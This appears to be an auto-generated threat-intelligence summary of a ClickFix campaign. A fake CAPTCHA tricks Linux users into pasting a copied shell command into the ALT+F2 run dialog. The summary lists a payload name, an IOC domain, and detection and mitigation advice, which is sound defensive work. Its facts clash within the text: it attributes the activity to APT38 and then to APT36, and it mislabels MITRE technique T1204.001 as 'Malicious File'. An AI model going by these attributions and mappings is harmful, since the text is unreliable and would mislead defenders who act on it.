Full Report
A new campaign employing ClickFix attacks has been spotted targeting both Windows and Linux systems using instructions that make infections on either operating system possible. [...]
Analysis Summary
# Tool/Technique: ClickFix Attack Flow Adaptation for Linux
## Overview
ClickFix is an attack methodology that leverages deceptive user interaction—often through browser-based prompts—to trick victims into copying and executing malicious commands on their local systems. Recent observations indicate that threat actors are testing an adaptation of this attack specifically targeting Linux users, following previous deployments against Windows and likely macOS systems.
## Technical Details
- Type: Technique / Attack Flow
- Platform: Linux (Targeted), Windows (Previously documented targets)
- Capabilities: Bypassing initial security controls by relying on user deception to execute arbitrary commands via system dialogs (e.g., ALT+F2 Run dialog on Linux).
- First Seen: Ongoing testing observed against Linux targets.
## MITRE ATT&CK Mapping
- T1204 - User Execution
- T1204.002 - Malicious File
- T1204.001 - Malicious File (Applicable when the user executes a copied command that drops a file)
## Functionality
### Core Capabilities
The attack flow relies on the following steps for Linux targets:
1. **OS Detection:** Determining the victim's operating system.
2. **Redirection:** Presenting a CAPTCHA page.
3. **Deception:** Instructing the user that clicking the "I'm not a robot button" copies a valid shell command to the clipboard.
4. **Execution Steganography:** Guiding the user to open the Linux run dialog (ALT+F2), paste the command, and execute it.
### Advanced Features
The current Linux payload (`mapeal.sh`) appears benign, fetching only a JPEG image. This suggests the **APT38 group (implied user of ClickFix)** is in the experimental phase, testing the viability of the Linux command execution chain before deploying actual malware. The primary mechanism is the successful execution of arbitrary commands dictated by the attacker via the browser/webpage interface.
## Indicators of Compromise
- File Hashes: [Not provided in the context]
- File Names: `mapeal.sh` (Dropped payload)
- Registry Keys: []
- Network Indicators: `trade4wealth[.]in` (Directory hosting the payload/image)
- Behavioral Indicators: Execution of a user-copied command via the ALT+F2 dialog after interacting with a CAPTCHA page; fetching of a JPEG file initiated by a shell command.
## Associated Threat Actors
- APT36 (Implied, based on the context linking ClickFix evolution to known groups, though not explicitly stated they are the *current* experimenters in this snippet).
## Detection Methods
- Signature-based detection: [Not detailed for the current Linux payload]
- Behavioral detection: Monitoring for the execution of commands pasted into the ALT+F2 run dialog, especially when preceded by web interaction.
- YARA rules: [Not provided in the context]
## Mitigation Strategies
- Prevention measures: Users must adhere to the policy of never copying and pasting commands into system run dialogs unless the source and content are fully verified.
- Hardening recommendations: Educate users about social engineering techniques that coerce command-line execution. Restrict user permissions where possible to limit the impact of dropped scripts.
## Related Tools/Techniques
- ClickFix attack variations targeting Windows (involving MSHTA and .NET loaders).
- General supply chain/web-based execution techniques that rely on user intervention (e.g., drive-by downloads, malvertising leading to command execution).